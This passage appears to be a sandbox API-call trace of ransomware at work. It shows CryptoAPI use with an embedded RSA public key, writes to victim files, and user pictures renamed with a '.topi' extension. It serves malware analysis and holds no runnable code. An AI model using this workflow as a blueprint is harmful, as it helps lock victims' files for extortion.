out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1c38 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.429] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x11b41, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x11b41, lpOverlapped=0x0) returned 1 [0095.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.430] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x11b46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.430] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.430] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.431] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.431] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.431] CloseHandle (hObject=0x6a8) returned 1 [0095.443] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.443] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.444] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CiJEW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cijew.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CiJEW.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cijew.jpg.topi")) returned 1 [0095.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.444] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.444] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.446] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.446] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16292d30, ftCreationTime.dwHighDateTime=0x1d5c058, ftLastAccessTime.dwLowDateTime=0x5bdf9ca0, ftLastAccessTime.dwHighDateTime=0x1d5b8cf, ftLastWriteTime.dwLowDateTime=0x5bdf9ca0, ftLastWriteTime.dwHighDateTime=0x1d5b8cf, nFileSizeHigh=0x0, nFileSizeLow=0xd347, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmf8FY.jpg", cAlternateFileName="")) returned 1 [0095.446] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.446] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.446] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.446] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cmf8FY.jpg") returned=".jpg" [0095.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cmf8FY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cmf8fy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.446] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=54087) returned 1 [0095.446] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.449] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd321, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.449] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.450] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.450] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.450] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd347, lpOverlapped=0x0) returned 1 [0095.450] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.450] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.451] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.452] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.452] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.452] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.452] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.452] GetLastError () returned 0x0 [0095.452] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.452] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.452] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.452] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.452] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.452] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.452] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd350) returned 0x99f72d8 [0095.453] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1c38 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1c80 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.453] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.453] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.453] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94e0 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d94c8 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.454] GetCurrentThreadId () returned 0x8c4 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f62b0 [0095.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.455] GetCurrentThreadId () returned 0x8c4 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94f8 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94c8 | out: hHeap=0x680000) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 